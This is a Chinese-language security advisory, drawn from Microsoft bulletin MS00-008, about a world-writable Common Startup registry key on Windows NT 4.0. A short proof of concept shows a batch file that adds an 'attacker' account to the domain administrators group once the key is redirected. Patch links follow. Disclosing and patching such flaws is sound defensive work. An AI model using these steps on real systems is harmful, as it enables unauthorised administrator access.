发布日期：2000-03-09
更新日期：2000-03-11

受影响系统：

Microsoft Windows NT 4.0

描述：

---

来源：Microsoft Security Bulletin MS00-008

    注册表键"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup"定义该系统所有用户共享的“启动”文件夹。该键对任何经过身份验证的用户可写。因此，任何用户都能指定该文件夹的位置，并使任何登录用户以其自身权限运行其中的程序。





测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

    在一个域控制器上，某批处理文件包含如下命令：
    
    net user attacker /add /domain
    net group administrators attacker /add /domain

将该文件置于c:\hackstartup文件夹中，然后修改注册表键的键值为"c:\hackstartup"。当下一次系统管理员登录时，帐号'attacker'将被创建并添加到该域的管理员组中。




建议：

---

    Microsoft提供以下安全补丁：

Microsoft Windows NT 4.0:

Microsoft hotfix q250625i (Intel Version)
http://download.microsoft.com/download/winntsp/Patch/regacl/NT4/EN-US/Q250625i.EXE

Microsoft hotfix q250625a (Alpha Version)
http://download.microsoft.com/download/winntsp/Patch/regacl/ALPHA/EN-US/Q250625A.EXE



浏览次数：6940
严重程度：0（网友投票）